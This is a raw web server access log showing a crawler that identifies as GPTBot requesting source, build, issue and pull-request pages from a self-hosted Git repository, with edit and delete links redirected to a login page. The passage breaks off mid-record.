[Length 14815] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:19:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md?display=rendered" [Client 74.7.227.38] [Length 17347] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:19:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec?display=source" [Client 74.7.227.38] [Length 13502] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:19:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py?display=source" [Client 74.7.227.38] [Length 15362] [Gzip 4.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:19:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log?display=source" [Client 74.7.227.38] [Length 11433] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:19:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:19:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:19:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" +[17/Feb/2026:19:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9958] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=all&type=all" +[17/Feb/2026:19:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11289] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:19:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" +[17/Feb/2026:19:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 492247] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:19:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 474262] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:19:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 493045] [Gzip 19.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:19:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=source" [Client 74.7.227.38] [Length 12864] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:19:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=source" [Client 74.7.227.38] [Length 12864] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:19:02:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:19:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:19:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:19:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11301] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:02:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:02:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:02:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:02:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:02:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:02:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 819487] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 819599] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 9815] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 722593] [Gzip 27.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 788394] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 750184] [Gzip 27.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 749710] [Gzip 27.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 